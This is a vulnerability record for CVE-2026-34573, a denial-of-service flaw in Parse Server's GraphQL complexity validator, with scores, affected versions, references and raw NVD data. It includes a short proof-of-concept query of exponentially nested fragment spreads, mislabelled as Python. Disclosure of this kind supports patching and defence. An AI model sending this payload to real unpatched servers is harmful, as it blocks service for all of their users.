CVE-2026-34573

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.68 and 9.7.0-alpha.12, the GraphQL query complexity validator can be exploited to cause a denial-of-service by sending a crafted query with binary fan-out fragment spreads. A single unauthenticated request can block the Node.js event loop for seconds, denying service to all concurrent users. This only affects deployments that have enabled the requestComplexity.graphQLDepth or requestComplexity.graphQLFields configuration options. This issue has been patched in versions 8.6.68 and 9.7.0-alpha.12.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha1:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha10:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha11:*:*:*:node.js:*:* - VULNERABLE

Parse Server < 8.6.68

Parse Server < 9.7.0-alpha.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for GraphQL Binary Fan-out Fragment Spreads
# This query exponentially increases complexity using fragment spreads.

fragment F0 on Query { user { id } }
fragment F1 on Query { ...F0 ...F0 }
fragment F2 on Query { ...F1 ...F1 }
fragment F3 on Query { ...F2 ...F2 }
fragment F4 on Query { ...F3 ...F3 }
fragment F5 on Query { ...F4 ...F4 }
fragment F6 on Query { ...F5 ...F5 }
fragment F7 on Query { ...F6 ...F6 }
fragment F8 on Query { ...F7 ...F7 }
fragment F9 on Query { ...F8 ...F8 }
fragment F10 on Query { ...F9 ...F9 }

query AttackQuery {
  ...F10
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34573
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34573
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34573/
[4] VulDB https://vuldb.com/cve/CVE-2026-34573
[5] https://github.com/parse-community/parse-server/commit/ea15412795f34594cc8a674fe858d445675e0295
[6] https://github.com/parse-community/parse-server/commit/f759bda075298ec44e2b4fb57659a0c56620483b
[7] https://github.com/parse-community/parse-server/pull/10344
[8] https://github.com/parse-community/parse-server/pull/10345
[9] https://github.com/parse-community/parse-server/security/advisories/GHSA-mfj6-6p54-m98c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34573", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:33.737", "lastModified": "2026-04-02T17:31:49.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.68 and 9.7.0-alpha.12, the GraphQL query complexity validator can be exploited to cause a denial-of-service by sending a crafted query with binary fan-out fragment spreads. A single unauthenticated request can block the Node.js event loop for seconds, denying service to all concurrent users. This only affects deployments that have enabled the requestComplexity.graphQLDepth or requestComplexity.graphQLFields configuration options. This issue has been patched in versions 8.6.68 and 9.7.0-alpha.12."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.68", "matchCriteriaId": "91ED46AD-D40A-440F-9B9C-E4C11E669E30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.7.0", "matchCriteriaId": "E3DFF698-B3EE-4DCA-BAF3-9BE52F0F77D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "3A140D3A-AECC-4CA1-958C-3CA53E313B27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha10:*:*:*:node.js:*:*", "matchCriteriaId": "80D441B8-3B25-40E5-82E2-71E2A5E2F58F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha11:*:*:*:node.js:*:*", "matchCriteriaId": "3CDAE590-5625-4B7C-9B52-23A6725F1B92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha2:*:*:*:node.js:*:*", "matchCriteriaId": "BEDAEFBC-DA77-4998-BDD6-A139E15E5CC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha3:*:*:*:node.js:*:*", "matchCriteriaId": "8C9E59AF-3B82-4D61-847B-A18E7DDF7A34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha4:*:*:*:node.js:*:*", "matchCriteriaId": "2AB743CC-D168-4313-A5AA-43CF76D178E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha5:*:*:*:node.js:*:*", "matchCriteriaId": "C351C736-AB91-4985-A0B4-43B120F5E5C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha6:*:*:*:node.js:*:*", "matchCriteriaId": "F02797C9-E67D-4BF4-BB56-8D6DA9178322"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha7:*:*:*:node.js:*:*", "matchCriteriaId": "B059E381-D0 ... (truncated)